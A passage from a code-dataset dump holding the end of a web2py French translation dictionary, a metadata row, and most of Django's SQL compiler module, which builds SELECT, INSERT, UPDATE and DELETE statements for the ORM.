'Manage %(action)s': 'Manage %(action)s',
'Manage Access Control': 'Manage Access Control',
'Manage Cache': 'Gérer le Cache',
'Memberships': 'Memberships',
'Menu Model': 'Menu modèle',
'Modified By': 'Modifié par',
'Modified On': 'Modifié le',
'My Sites': 'Mes sites',
'Name': 'Nom',
'New Record': 'Nouvel enregistrement',
'new record inserted': 'nouvel enregistrement inséré',
'next %s rows': 'next %s rows',
'next 100 rows': '100 prochaines lignes',
'No databases in this application': "Cette application n'a pas de bases de données",
'Object or table name': 'Objet ou nom de table',
'Online book': 'Online book',
'Online examples': 'Exemples en ligne',
'or import from csv file': "ou importer d'un fichier CSV",
'Origin': 'Origine',
'Other Plugins': 'Autres Plugins',
'Other Recipes': 'Autres recettes',
'Overview': 'Présentation',
'Password': 'Mot de passe',
"Password fields don't match": 'Les mots de passe ne correspondent pas',
'Permission': 'Permission',
'Permissions': 'Permissions',
'Plugins': 'Plugins',
'Powered by': 'Alimenté par',
'Preface': 'Préface',
'previous %s rows': 'previous %s rows',
'previous 100 rows': '100 lignes précédentes',
'pygraphviz library not found': 'pygraphviz library not found',
'Python': 'Python',
'Query:': 'Requête:',
'Quick Examples': 'Exemples Rapides',
'RAM': 'RAM',
'RAM Cache Keys': 'Clés de cache de la RAM',
'Ram Cleared': 'Ram vidée',
'Readme': 'Lisez-moi',
'Recipes': 'Recettes',
'Record': 'enregistrement',
'record does not exist': "l'archive n'existe pas",
'Record ID': "ID d'enregistrement",
'Record id': "id d'enregistrement",
'Register': "S'inscrire",
'register': "s'inscrire",
'Registration identifier': "Identifiant d'enregistrement",
'Registration key': "Clé d'enregistrement",
'Remember me (for 30 days)': 'Se souvenir de moi (pendant 30 jours)',
'Request reset password': 'Demande de réinitialiser le mot clé',
'Reset Password key': 'Réinitialiser le mot clé',
'Resources': 'Ressources',
'Role': 'Rôle',
'Roles': 'Roles',
'Rows in Table': 'Lignes du tableau',
'Rows selected': 'Lignes sélectionnées',
'Save model as...': 'Save model as...',
'Semantic': 'Sémantique',
'Services': 'Services',
'Sign Up': 'Sign Up',
'Size of cache:': 'Taille du cache:',
'starting characters of title to find the publication offline or online': 'starting characters of title to find the publication offline or online',
'state': 'état',
'Statistics': 'Statistiques',
'Stylesheet': 'Feuille de style',
'submit': 'soumettre',
'Submit': 'Soumettre',
'Support': 'Support',
'Sure you want to delete this object?': 'Êtes-vous sûr de vouloir supprimer cet objet?',
'Table': 'tableau',
'Table name': 'Nom du tableau',
'The "query" is a condition like "db.table1.field1==\'value\'". Something like "db.table1.field1==db.table2.field2" results in a SQL JOIN.': 'La "requête" est une condition comme "db.table1.champ1==\'valeur\'". Quelque chose comme "db.table1.champ1==db.table2.champ2" résulte en un JOIN SQL.',
'The Core': 'Le noyau',
'The output of the file is a dictionary that was rendered by the view %s': 'La sortie de ce fichier est un dictionnaire qui été restitué par la vue %s',
'The Views': 'Les Vues',
'This App': 'Cette Appli',
'This is a copy of the scaffolding application': "Ceci est une copie de l'application échafaudage",
'Time in Cache (h:m:s)': 'Temps en Cache (h:m:s)',
'Timestamp': 'Horodatage',
'Title': 'Title',
'Traceback': 'Traceback',
'Try find by': 'Try find by',
'Twitter': 'Twitter',
'unable to parse csv file': "incapable d'analyser le fichier cvs",
'Update:': 'Mise à jour:',
'Use (...)&(...) for AND, (...)|(...) for OR, and ~(...) for NOT to build more complex queries.': 'Employez (...)&(...) pour AND, (...)|(...) pour OR, and ~(...) pour NOT afin de construire des requêtes plus complexes.',
'User': 'User',
'User %(id)s Logged-in': 'Utilisateur %(id)s connecté',
'User %(id)s Registered': 'Utilisateur %(id)s enregistré',
'User ID': 'ID utilisateur',
'User Voice': "Voix de l'utilisateur",
'Users': 'Users',
'Verify Password': 'Vérifiez le mot de passe',
'Videos': 'Vidéos',
'View': 'Présentation',
'Web2py': 'Web2py',
'Welcome': 'Bienvenue',
'Welcome %s': 'Bienvenue %s',
'Welcome to web2py': 'Bienvenue à web2py',
'Welcome to web2py!': 'Bienvenue à web2py!',
'Which called the function %s located in the file %s': 'Qui a appelé la fonction %s se trouvant dans le fichier %s',
'Working...': 'Working...',
'You are successfully running web2py': 'Vous exécutez avec succès web2py',
'You can modify this application and adapt it to your needs': "Vous pouvez modifier cette application et l'adapter à vos besoins",
'You visited the url %s': "Vous avez visité l'URL %s",
}
| agpl-3.0 | -1,561,224,637,631,581,700 | 39.636771 | 293 | 0.687817 | false |
pombredanne/algos-urv | django/db/models/sql/compiler.py | 9 | 44075 | from django.core.exceptions import FieldError
from django.db import connections
from django.db.backends.util import truncate_name
from django.db.models.sql.constants import *
from django.db.models.sql.datastructures import EmptyResultSet
from django.db.models.sql.expressions import SQLEvaluator
from django.db.models.sql.query import get_proxied_model, get_order_dir, \
select_related_descend, Query
class SQLCompiler(object):
def __init__(self, query, connection, using):
self.query = query
self.connection = connection
self.using = using
self.quote_cache = {}
def pre_sql_setup(self):
"""
Does any necessary class setup immediately prior to producing SQL. This
is for things that can't necessarily be done in __init__ because we
might not have all the pieces in place at that time.
"""
if not self.query.tables:
self.query.join((None, self.query.model._meta.db_table, None, None))
if (not self.query.select and self.query.default_cols and not
self.query.included_inherited_models):
self.query.setup_inherited_models()
if self.query.select_related and not self.query.related_select_cols:
self.fill_related_selections()
def quote_name_unless_alias(self, name):
"""
A wrapper around connection.ops.quote_name that doesn't quote aliases
for table names. This avoids problems with some SQL dialects that treat
quoted strings specially (e.g. PostgreSQL).
"""
if name in self.quote_cache:
return self.quote_cache[name]
if ((name in self.query.alias_map and name not in self.query.table_map) or
name in self.query.extra_select):
self.quote_cache[name] = name
return name
r = self.connection.ops.quote_name(name)
self.quote_cache[name] = r
return r
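        # Illustrative behaviour (backend-dependent): a real table name goes
        # through connection.ops.quote_name (e.g. 'auth_user' -> '"auth_user"'
        # on PostgreSQL), while an alias such as 'T3' or an extra-select key
        # is returned unchanged.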
def as_sql(self, with_limits=True, with_col_aliases=False):
"""
Creates the SQL for this query. Returns the SQL string and list of
parameters.
If 'with_limits' is False, any limit/offset information is not included
in the query.
"""
if with_limits and self.query.low_mark == self.query.high_mark:
return '', ()
self.pre_sql_setup()
out_cols = self.get_columns(with_col_aliases)
ordering, ordering_group_by = self.get_ordering()
# This must come after 'select' and 'ordering' -- see docstring of
# get_from_clause() for details.
from_, f_params = self.get_from_clause()
qn = self.quote_name_unless_alias
where, w_params = self.query.where.as_sql(qn=qn, connection=self.connection)
having, h_params = self.query.having.as_sql(qn=qn, connection=self.connection)
params = []
for val in self.query.extra_select.itervalues():
params.extend(val[1])
result = ['SELECT']
if self.query.distinct:
result.append('DISTINCT')
result.append(', '.join(out_cols + self.query.ordering_aliases))
result.append('FROM')
result.extend(from_)
params.extend(f_params)
if where:
result.append('WHERE %s' % where)
params.extend(w_params)
grouping, gb_params = self.get_grouping()
if grouping:
if ordering:
# If the backend can't group by PK (i.e., any database
# other than MySQL), then any fields mentioned in the
# ordering clause needs to be in the group by clause.
if not self.connection.features.allows_group_by_pk:
for col, col_params in ordering_group_by:
if col not in grouping:
grouping.append(str(col))
gb_params.extend(col_params)
else:
ordering = self.connection.ops.force_no_ordering()
result.append('GROUP BY %s' % ', '.join(grouping))
params.extend(gb_params)
if having:
result.append('HAVING %s' % having)
params.extend(h_params)
if ordering:
result.append('ORDER BY %s' % ', '.join(ordering))
if with_limits:
if self.query.high_mark is not None:
result.append('LIMIT %d' % (self.query.high_mark - self.query.low_mark))
if self.query.low_mark:
if self.query.high_mark is None:
val = self.connection.ops.no_limit_value()
if val:
result.append('LIMIT %d' % val)
result.append('OFFSET %d' % self.query.low_mark)
return ' '.join(result), tuple(params)
def as_nested_sql(self):
"""
Perform the same functionality as the as_sql() method, returning an
SQL string and parameters. However, the alias prefixes are bumped
beforehand (in a copy -- the current query isn't changed), and any
ordering is removed if the query is unsliced.
Used when nesting this query inside another.
"""
obj = self.query.clone()
if obj.low_mark == 0 and obj.high_mark is None:
# If there is no slicing in use, then we can safely drop all ordering
obj.clear_ordering(True)
obj.bump_prefix()
return obj.get_compiler(connection=self.connection).as_sql()
def get_columns(self, with_aliases=False):
"""
Returns the list of columns to use in the select statement. If no
columns have been specified, returns all columns relating to fields in
the model.
If 'with_aliases' is true, any column names that are duplicated
(without the table names) are given unique aliases. This is needed in
some cases to avoid ambiguity with nested queries.
"""
qn = self.quote_name_unless_alias
qn2 = self.connection.ops.quote_name
result = ['(%s) AS %s' % (col[0], qn2(alias)) for alias, col in self.query.extra_select.iteritems()]
aliases = set(self.query.extra_select.keys())
if with_aliases:
col_aliases = aliases.copy()
else:
col_aliases = set()
if self.query.select:
only_load = self.deferred_to_columns()
for col in self.query.select:
if isinstance(col, (list, tuple)):
alias, column = col
table = self.query.alias_map[alias][TABLE_NAME]
if table in only_load and col not in only_load[table]:
continue
r = '%s.%s' % (qn(alias), qn(column))
if with_aliases:
if col[1] in col_aliases:
c_alias = 'Col%d' % len(col_aliases)
result.append('%s AS %s' % (r, c_alias))
aliases.add(c_alias)
col_aliases.add(c_alias)
else:
result.append('%s AS %s' % (r, qn2(col[1])))
aliases.add(r)
col_aliases.add(col[1])
else:
result.append(r)
aliases.add(r)
col_aliases.add(col[1])
else:
result.append(col.as_sql(qn, self.connection))
if hasattr(col, 'alias'):
aliases.add(col.alias)
col_aliases.add(col.alias)
elif self.query.default_cols:
cols, new_aliases = self.get_default_columns(with_aliases,
col_aliases)
result.extend(cols)
aliases.update(new_aliases)
max_name_length = self.connection.ops.max_name_length()
result.extend([
'%s%s' % (
aggregate.as_sql(qn, self.connection),
alias is not None
and ' AS %s' % qn(truncate_name(alias, max_name_length))
or ''
)
for alias, aggregate in self.query.aggregate_select.items()
])
for table, col in self.query.related_select_cols:
r = '%s.%s' % (qn(table), qn(col))
if with_aliases and col in col_aliases:
c_alias = 'Col%d' % len(col_aliases)
result.append('%s AS %s' % (r, c_alias))
aliases.add(c_alias)
col_aliases.add(c_alias)
else:
result.append(r)
aliases.add(r)
col_aliases.add(col)
self._select_aliases = aliases
return result
def get_default_columns(self, with_aliases=False, col_aliases=None,
start_alias=None, opts=None, as_pairs=False, local_only=False):
"""
Computes the default columns for selecting every field in the base
model. Will sometimes be called to pull in related models (e.g. via
select_related), in which case "opts" and "start_alias" will be given
to provide a starting point for the traversal.
Returns a list of strings, quoted appropriately for use in SQL
directly, as well as a set of aliases used in the select statement (if
'as_pairs' is True, returns a list of (alias, col_name) pairs instead
of strings as the first component and None as the second component).
"""
result = []
if opts is None:
opts = self.query.model._meta
qn = self.quote_name_unless_alias
qn2 = self.connection.ops.quote_name
aliases = set()
only_load = self.deferred_to_columns()
# Skip all proxy to the root proxied model
proxied_model = get_proxied_model(opts)
if start_alias:
seen = {None: start_alias}
for field, model in opts.get_fields_with_model():
if local_only and model is not None:
continue
if start_alias:
try:
alias = seen[model]
except KeyError:
if model is proxied_model:
alias = start_alias
else:
link_field = opts.get_ancestor_link(model)
alias = self.query.join((start_alias, model._meta.db_table,
link_field.column, model._meta.pk.column))
seen[model] = alias
else:
# If we're starting from the base model of the queryset, the
# aliases will have already been set up in pre_sql_setup(), so
# we can save time here.
alias = self.query.included_inherited_models[model]
table = self.query.alias_map[alias][TABLE_NAME]
if table in only_load and field.column not in only_load[table]:
continue
if as_pairs:
result.append((alias, field.column))
aliases.add(alias)
continue
if with_aliases and field.column in col_aliases:
c_alias = 'Col%d' % len(col_aliases)
result.append('%s.%s AS %s' % (qn(alias),
qn2(field.column), c_alias))
col_aliases.add(c_alias)
aliases.add(c_alias)
else:
r = '%s.%s' % (qn(alias), qn2(field.column))
result.append(r)
aliases.add(r)
if with_aliases:
col_aliases.add(field.column)
return result, aliases
def get_ordering(self):
"""
Returns a tuple containing a list representing the SQL elements in the
"order by" clause, and the list of SQL elements that need to be added
to the GROUP BY clause as a result of the ordering.
Also sets the ordering_aliases attribute on this instance to a list of
extra aliases needed in the select.
Determining the ordering SQL can change the tables we need to include,
so this should be run *before* get_from_clause().
"""
if self.query.extra_order_by:
ordering = self.query.extra_order_by
elif not self.query.default_ordering:
ordering = self.query.order_by
else:
ordering = self.query.order_by or self.query.model._meta.ordering
qn = self.quote_name_unless_alias
qn2 = self.connection.ops.quote_name
distinct = self.query.distinct
select_aliases = self._select_aliases
result = []
group_by = []
ordering_aliases = []
if self.query.standard_ordering:
asc, desc = ORDER_DIR['ASC']
else:
asc, desc = ORDER_DIR['DESC']
# It's possible, due to model inheritance, that normal usage might try
# to include the same field more than once in the ordering. We track
# the table/column pairs we use and discard any after the first use.
processed_pairs = set()
for field in ordering:
if field == '?':
result.append(self.connection.ops.random_function_sql())
continue
if isinstance(field, int):
if field < 0:
order = desc
field = -field
else:
order = asc
result.append('%s %s' % (field, order))
group_by.append((field, []))
continue
col, order = get_order_dir(field, asc)
if col in self.query.aggregate_select:
result.append('%s %s' % (col, order))
continue
if '.' in field:
# This came in through an extra(order_by=...) addition. Pass it
# on verbatim.
table, col = col.split('.', 1)
if (table, col) not in processed_pairs:
elt = '%s.%s' % (qn(table), col)
processed_pairs.add((table, col))
if not distinct or elt in select_aliases:
result.append('%s %s' % (elt, order))
group_by.append((elt, []))
elif get_order_dir(field)[0] not in self.query.extra_select:
# 'col' is of the form 'field' or 'field1__field2' or
# '-field1__field2__field', etc.
for table, col, order in self.find_ordering_name(field,
self.query.model._meta, default_order=asc):
if (table, col) not in processed_pairs:
elt = '%s.%s' % (qn(table), qn2(col))
processed_pairs.add((table, col))
if distinct and elt not in select_aliases:
ordering_aliases.append(elt)
result.append('%s %s' % (elt, order))
group_by.append((elt, []))
else:
elt = qn2(col)
if distinct and col not in select_aliases:
ordering_aliases.append(elt)
result.append('%s %s' % (elt, order))
group_by.append(self.query.extra_select[col])
self.query.ordering_aliases = ordering_aliases
return result, group_by
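        # Illustrative result (exact SQL is backend-dependent): for an
        # ordering of ['-name', '?'] this returns something like
        # (['"app_model"."name" DESC', 'RANDOM()'],
        #  [('"app_model"."name"', [])]).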
def find_ordering_name(self, name, opts, alias=None, default_order='ASC',
already_seen=None):
"""
Returns the table alias (the name might be ambiguous, the alias will
not be) and column name for ordering by the given 'name' parameter.
The 'name' is of the form 'field1__field2__...__fieldN'.
"""
name, order = get_order_dir(name, default_order)
pieces = name.split(LOOKUP_SEP)
if not alias:
alias = self.query.get_initial_alias()
field, target, opts, joins, last, extra = self.query.setup_joins(pieces,
opts, alias, False)
alias = joins[-1]
col = target.column
if not field.rel:
# To avoid inadvertent trimming of a necessary alias, use the
# refcount to show that we are referencing a non-relation field on
# the model.
self.query.ref_alias(alias)
# Must use left outer joins for nullable fields and their relations.
self.query.promote_alias_chain(joins,
self.query.alias_map[joins[0]][JOIN_TYPE] == self.query.LOUTER)
# If we get to this point and the field is a relation to another model,
# append the default ordering for that model.
if field.rel and len(joins) > 1 and opts.ordering:
# Firstly, avoid infinite loops.
if not already_seen:
already_seen = set()
join_tuple = tuple([self.query.alias_map[j][TABLE_NAME] for j in joins])
if join_tuple in already_seen:
raise FieldError('Infinite loop caused by ordering.')
already_seen.add(join_tuple)
results = []
for item in opts.ordering:
results.extend(self.find_ordering_name(item, opts, alias,
order, already_seen))
return results
if alias:
# We have to do the same "final join" optimisation as in
# add_filter, since the final column might not otherwise be part of
# the select set (so we can't order on it).
while 1:
join = self.query.alias_map[alias]
if col != join[RHS_JOIN_COL]:
break
self.query.unref_alias(alias)
alias = join[LHS_ALIAS]
col = join[LHS_JOIN_COL]
return [(alias, col, order)]
def get_from_clause(self):
"""
Returns a list of strings that are joined together to go after the
"FROM" part of the query, as well as a list any extra parameters that
need to be included. Sub-classes, can override this to create a
from-clause via a "select".
This should only be called after any SQL construction methods that
might change the tables we need. This means the select columns and
ordering must be done first.
"""
result = []
qn = self.quote_name_unless_alias
qn2 = self.connection.ops.quote_name
first = True
for alias in self.query.tables:
if not self.query.alias_refcount[alias]:
continue
try:
name, alias, join_type, lhs, lhs_col, col, nullable = self.query.alias_map[alias]
except KeyError:
# Extra tables can end up in self.tables, but not in the
# alias_map if they aren't in a join. That's OK. We skip them.
continue
alias_str = (alias != name and ' %s' % alias or '')
if join_type and not first:
result.append('%s %s%s ON (%s.%s = %s.%s)'
% (join_type, qn(name), alias_str, qn(lhs),
qn2(lhs_col), qn(alias), qn2(col)))
else:
connector = not first and ', ' or ''
result.append('%s%s%s' % (connector, qn(name), alias_str))
first = False
for t in self.query.extra_tables:
alias, unused = self.query.table_alias(t)
# Only add the alias if it's not already present (the table_alias()
            # call increments the refcount, so an alias refcount of one means
            # this is the only reference).
if alias not in self.query.alias_map or self.query.alias_refcount[alias] == 1:
connector = not first and ', ' or ''
result.append('%s%s' % (connector, qn(alias)))
first = False
return result, []
def get_grouping(self):
"""
Returns a tuple representing the SQL elements in the "group by" clause.
"""
qn = self.quote_name_unless_alias
result, params = [], []
if self.query.group_by is not None:
if len(self.query.model._meta.fields) == len(self.query.select) and \
self.connection.features.allows_group_by_pk:
self.query.group_by = [(self.query.model._meta.db_table, self.query.model._meta.pk.column)]
group_by = self.query.group_by or []
extra_selects = []
for extra_select, extra_params in self.query.extra_select.itervalues():
extra_selects.append(extra_select)
params.extend(extra_params)
for col in group_by + self.query.related_select_cols + extra_selects:
if isinstance(col, (list, tuple)):
result.append('%s.%s' % (qn(col[0]), qn(col[1])))
elif hasattr(col, 'as_sql'):
result.append(col.as_sql(qn))
else:
result.append('(%s)' % str(col))
return result, params
def fill_related_selections(self, opts=None, root_alias=None, cur_depth=1,
used=None, requested=None, restricted=None, nullable=None,
dupe_set=None, avoid_set=None):
"""
Fill in the information needed for a select_related query. The current
depth is measured as the number of connections away from the root model
(for example, cur_depth=1 means we are looking at models with direct
connections to the root model).
"""
if not restricted and self.query.max_depth and cur_depth > self.query.max_depth:
# We've recursed far enough; bail out.
return
if not opts:
opts = self.query.get_meta()
root_alias = self.query.get_initial_alias()
self.query.related_select_cols = []
self.query.related_select_fields = []
if not used:
used = set()
if dupe_set is None:
dupe_set = set()
if avoid_set is None:
avoid_set = set()
orig_dupe_set = dupe_set
# Setup for the case when only particular related fields should be
# included in the related selection.
if requested is None:
if isinstance(self.query.select_related, dict):
requested = self.query.select_related
restricted = True
else:
restricted = False
for f, model in opts.get_fields_with_model():
if not select_related_descend(f, restricted, requested):
continue
# The "avoid" set is aliases we want to avoid just for this
# particular branch of the recursion. They aren't permanently
# forbidden from reuse in the related selection tables (which is
# what "used" specifies).
avoid = avoid_set.copy()
dupe_set = orig_dupe_set.copy()
table = f.rel.to._meta.db_table
promote = nullable or f.null
if model:
int_opts = opts
alias = root_alias
alias_chain = []
for int_model in opts.get_base_chain(model):
                    # Proxy models have elements in the base chain with no
                    # parents; assign the new options object and skip to the
                    # next base in that case.
if not int_opts.parents[int_model]:
int_opts = int_model._meta
continue
lhs_col = int_opts.parents[int_model].column
dedupe = lhs_col in opts.duplicate_targets
if dedupe:
avoid.update(self.query.dupe_avoidance.get((id(opts), lhs_col),
()))
dupe_set.add((opts, lhs_col))
int_opts = int_model._meta
alias = self.query.join((alias, int_opts.db_table, lhs_col,
int_opts.pk.column), exclusions=used,
promote=promote)
alias_chain.append(alias)
for (dupe_opts, dupe_col) in dupe_set:
self.query.update_dupe_avoidance(dupe_opts, dupe_col, alias)
if self.query.alias_map[root_alias][JOIN_TYPE] == self.query.LOUTER:
self.query.promote_alias_chain(alias_chain, True)
else:
alias = root_alias
dedupe = f.column in opts.duplicate_targets
if dupe_set or dedupe:
avoid.update(self.query.dupe_avoidance.get((id(opts), f.column), ()))
if dedupe:
dupe_set.add((opts, f.column))
alias = self.query.join((alias, table, f.column,
f.rel.get_related_field().column),
exclusions=used.union(avoid), promote=promote)
used.add(alias)
columns, aliases = self.get_default_columns(start_alias=alias,
opts=f.rel.to._meta, as_pairs=True)
self.query.related_select_cols.extend(columns)
if self.query.alias_map[alias][JOIN_TYPE] == self.query.LOUTER:
self.query.promote_alias_chain(aliases, True)
self.query.related_select_fields.extend(f.rel.to._meta.fields)
if restricted:
next = requested.get(f.name, {})
else:
next = False
new_nullable = f.null or promote
for dupe_opts, dupe_col in dupe_set:
self.query.update_dupe_avoidance(dupe_opts, dupe_col, alias)
self.fill_related_selections(f.rel.to._meta, alias, cur_depth + 1,
used, next, restricted, new_nullable, dupe_set, avoid)
if restricted:
related_fields = [
(o.field, o.model)
for o in opts.get_all_related_objects()
if o.field.unique
]
for f, model in related_fields:
if not select_related_descend(f, restricted, requested, reverse=True):
continue
# The "avoid" set is aliases we want to avoid just for this
# particular branch of the recursion. They aren't permanently
# forbidden from reuse in the related selection tables (which is
# what "used" specifies).
avoid = avoid_set.copy()
dupe_set = orig_dupe_set.copy()
table = model._meta.db_table
int_opts = opts
alias = root_alias
alias_chain = []
chain = opts.get_base_chain(f.rel.to)
if chain is not None:
for int_model in chain:
                        # Proxy models have elements in the base chain
                        # with no parents; assign the new options
                        # object and skip to the next base in that
                        # case.
if not int_opts.parents[int_model]:
int_opts = int_model._meta
continue
lhs_col = int_opts.parents[int_model].column
dedupe = lhs_col in opts.duplicate_targets
if dedupe:
                            avoid.update(self.query.dupe_avoidance.get((id(opts), lhs_col),
                                    ()))
dupe_set.add((opts, lhs_col))
int_opts = int_model._meta
alias = self.query.join(
(alias, int_opts.db_table, lhs_col, int_opts.pk.column),
exclusions=used, promote=True, reuse=used
)
alias_chain.append(alias)
for dupe_opts, dupe_col in dupe_set:
self.query.update_dupe_avoidance(dupe_opts, dupe_col, alias)
dedupe = f.column in opts.duplicate_targets
if dupe_set or dedupe:
avoid.update(self.query.dupe_avoidance.get((id(opts), f.column), ()))
if dedupe:
dupe_set.add((opts, f.column))
alias = self.query.join(
(alias, table, f.rel.get_related_field().column, f.column),
exclusions=used.union(avoid),
promote=True
)
used.add(alias)
columns, aliases = self.get_default_columns(start_alias=alias,
opts=model._meta, as_pairs=True, local_only=True)
self.query.related_select_cols.extend(columns)
self.query.related_select_fields.extend(model._meta.fields)
next = requested.get(f.related_query_name(), {})
new_nullable = f.null or None
self.fill_related_selections(model._meta, table, cur_depth+1,
used, next, restricted, new_nullable)
def deferred_to_columns(self):
"""
Converts the self.deferred_loading data structure to mapping of table
names to sets of column names which are to be loaded. Returns the
dictionary.
"""
columns = {}
self.query.deferred_to_data(columns, self.query.deferred_to_columns_cb)
return columns
def results_iter(self):
"""
Returns an iterator over the results from executing this query.
"""
resolve_columns = hasattr(self, 'resolve_columns')
fields = None
for rows in self.execute_sql(MULTI):
for row in rows:
if resolve_columns:
if fields is None:
# We only set this up here because
# related_select_fields isn't populated until
# execute_sql() has been called.
if self.query.select_fields:
fields = self.query.select_fields + self.query.related_select_fields
else:
fields = self.query.model._meta.fields
# If the field was deferred, exclude it from being passed
# into `resolve_columns` because it wasn't selected.
only_load = self.deferred_to_columns()
if only_load:
db_table = self.query.model._meta.db_table
fields = [f for f in fields if db_table in only_load and
f.column in only_load[db_table]]
row = self.resolve_columns(row, fields)
if self.query.aggregate_select:
aggregate_start = len(self.query.extra_select.keys()) + len(self.query.select)
aggregate_end = aggregate_start + len(self.query.aggregate_select)
row = tuple(row[:aggregate_start]) + tuple([
self.query.resolve_aggregate(value, aggregate, self.connection)
for (alias, aggregate), value
in zip(self.query.aggregate_select.items(), row[aggregate_start:aggregate_end])
]) + tuple(row[aggregate_end:])
yield row
def has_results(self):
# This is always executed on a query clone, so we can modify self.query
self.query.add_extra({'a': 1}, None, None, None, None, None)
self.query.set_extra_mask(('a',))
return bool(self.execute_sql(SINGLE))
def execute_sql(self, result_type=MULTI):
"""
        Run the query against the database and return the result(s). The
return value is a single data item if result_type is SINGLE, or an
iterator over the results if the result_type is MULTI.
result_type is either MULTI (use fetchmany() to retrieve all rows),
SINGLE (only retrieve a single row), or None. In this last case, the
cursor is returned if any query is executed, since it's used by
        subclasses such as InsertQuery. It's possible, however, that no query
is needed, as the filters describe an empty set. In that case, None is
returned, to avoid any unnecessary database interaction.
"""
try:
sql, params = self.as_sql()
if not sql:
raise EmptyResultSet
except EmptyResultSet:
if result_type == MULTI:
return empty_iter()
else:
return
cursor = self.connection.cursor()
cursor.execute(sql, params)
if not result_type:
return cursor
if result_type == SINGLE:
if self.query.ordering_aliases:
return cursor.fetchone()[:-len(self.query.ordering_aliases)]
return cursor.fetchone()
# The MULTI case.
if self.query.ordering_aliases:
result = order_modified_iter(cursor, len(self.query.ordering_aliases),
self.connection.features.empty_fetchmany_value)
else:
result = iter((lambda: cursor.fetchmany(GET_ITERATOR_CHUNK_SIZE)),
self.connection.features.empty_fetchmany_value)
if not self.connection.features.can_use_chunked_reads:
# If we are using non-chunked reads, we return the same data
# structure as normally, but ensure it is all read into memory
# before going any further.
return list(result)
return result
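# Illustrative sketch (not part of the original module) of how callers drive
# execute_sql(); the queryset/compiler names here are hypothetical:
#
#     compiler = some_query.get_compiler(using)
#     row_blocks = compiler.execute_sql(MULTI)   # iterator of row blocks
#     one_row = compiler.execute_sql(SINGLE)     # a single row tuple, or None
#     cursor = compiler.execute_sql(None)        # raw cursor, used by subclasses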
class SQLInsertCompiler(SQLCompiler):
def placeholder(self, field, val):
if field is None:
# A field value of None means the value is raw.
return val
elif hasattr(field, 'get_placeholder'):
# Some fields (e.g. geo fields) need special munging before
# they can be inserted.
return field.get_placeholder(val, self.connection)
else:
# Return the common case for the placeholder
return '%s'
def as_sql(self):
# We don't need quote_name_unless_alias() here, since these are all
# going to be column names (so we can avoid the extra overhead).
qn = self.connection.ops.quote_name
opts = self.query.model._meta
result = ['INSERT INTO %s' % qn(opts.db_table)]
result.append('(%s)' % ', '.join([qn(c) for c in self.query.columns]))
values = [self.placeholder(*v) for v in self.query.values]
result.append('VALUES (%s)' % ', '.join(values))
params = self.query.params
if self.return_id and self.connection.features.can_return_id_from_insert:
col = "%s.%s" % (qn(opts.db_table), qn(opts.pk.column))
r_fmt, r_params = self.connection.ops.return_insert_id()
result.append(r_fmt % col)
params = params + r_params
return ' '.join(result), params
def execute_sql(self, return_id=False):
self.return_id = return_id
cursor = super(SQLInsertCompiler, self).execute_sql(None)
if not (return_id and cursor):
return
if self.connection.features.can_return_id_from_insert:
return self.connection.ops.fetch_returned_insert_id(cursor)
return self.connection.ops.last_insert_id(cursor,
self.query.model._meta.db_table, self.query.model._meta.pk.column)
class SQLDeleteCompiler(SQLCompiler):
def as_sql(self):
"""
Creates the SQL for this query. Returns the SQL string and list of
parameters.
"""
assert len(self.query.tables) == 1, \
"Can only delete from one table at a time."
qn = self.quote_name_unless_alias
result = ['DELETE FROM %s' % qn(self.query.tables[0])]
where, params = self.query.where.as_sql(qn=qn, connection=self.connection)
result.append('WHERE %s' % where)
return ' '.join(result), tuple(params)
class SQLUpdateCompiler(SQLCompiler):
def as_sql(self):
"""
Creates the SQL for this query. Returns the SQL string and list of
parameters.
"""
from django.db.models.base import Model
self.pre_sql_setup()
if not self.query.values:
return '', ()
table = self.query.tables[0]
qn = self.quote_name_unless_alias
result = ['UPDATE %s' % qn(table)]
result.append('SET')
values, update_params = [], []
for field, model, val in self.query.values:
if hasattr(val, 'prepare_database_save'):
val = val.prepare_database_save(field)
else:
val = field.get_db_prep_save(val, connection=self.connection)
# Getting the placeholder for the field.
if hasattr(field, 'get_placeholder'):
placeholder = field.get_placeholder(val, self.connection)
else:
placeholder = '%s'
if hasattr(val, 'evaluate'):
val = SQLEvaluator(val, self.query, allow_joins=False)
name = field.column
if hasattr(val, 'as_sql'):
sql, params = val.as_sql(qn, self.connection)
values.append('%s = %s' % (qn(name), sql))
update_params.extend(params)
elif val is not None:
values.append('%s = %s' % (qn(name), placeholder))
update_params.append(val)
else:
values.append('%s = NULL' % qn(name))
if not values:
return '', ()
result.append(', '.join(values))
where, params = self.query.where.as_sql(qn=qn, connection=self.connection)
if where:
result.append('WHERE %s' % where)
return ' '.join(result), tuple(update_params + params)
def execute_sql(self, result_type):
"""
Execute the specified update. Returns the number of rows affected by
the primary update query. The "primary update query" is the first
non-empty query that is executed. Row counts for any subsequent,
related queries are not available.
"""
cursor = super(SQLUpdateCompiler, self).execute_sql(result_type)
rows = cursor and cursor.rowcount or 0
is_empty = cursor is None
del cursor
for query in self.query.get_related_updates():
aux_rows = query.get_compiler(self.using).execute_sql(result_type)
if is_empty:
rows = aux_rows
is_empty = False
return rows
def pre_sql_setup(self):
"""
If the update depends on results from other tables, we need to do some
munging of the "where" conditions to match the format required for
(portable) SQL updates. That is done here.
Further, if we are going to be running multiple updates, we pull out
the id values to update at this point so that they don't change as a
result of the progressive updates.
"""
self.query.select_related = False
self.query.clear_ordering(True)
super(SQLUpdateCompiler, self).pre_sql_setup()
count = self.query.count_active_tables()
if not self.query.related_updates and count == 1:
return
# We need to use a sub-select in the where clause to filter on things
# from other tables.
query = self.query.clone(klass=Query)
query.bump_prefix()
query.extra = {}
query.select = []
query.add_fields([query.model._meta.pk.name])
must_pre_select = count > 1 and not self.connection.features.update_can_self_select
# Now we adjust the current query: reset the where clause and get rid
# of all the tables we don't need (since they're in the sub-select).
self.query.where = self.query.where_class()
if self.query.related_updates or must_pre_select:
# Either we're using the idents in multiple update queries (so
# don't want them to change), or the db backend doesn't support
# selecting from the updating table (e.g. MySQL).
idents = []
for rows in query.get_compiler(self.using).execute_sql(MULTI):
idents.extend([r[0] for r in rows])
self.query.add_filter(('pk__in', idents))
self.query.related_ids = idents
else:
# The fast path. Filters and updates in one query.
self.query.add_filter(('pk__in', query))
for alias in self.query.tables[1:]:
self.query.alias_refcount[alias] = 0
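# Rough sketch (assumed, not from the original source) of the SQL shape this
# setup yields when other tables are involved: the UPDATE stays on a single
# table and filters on pre-selected primary keys, e.g.
#
#     UPDATE mytable SET col = %s WHERE id IN (<ids gathered by the sub-select>)
#
# where 'mytable' and 'col' are hypothetical names.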
class SQLAggregateCompiler(SQLCompiler):
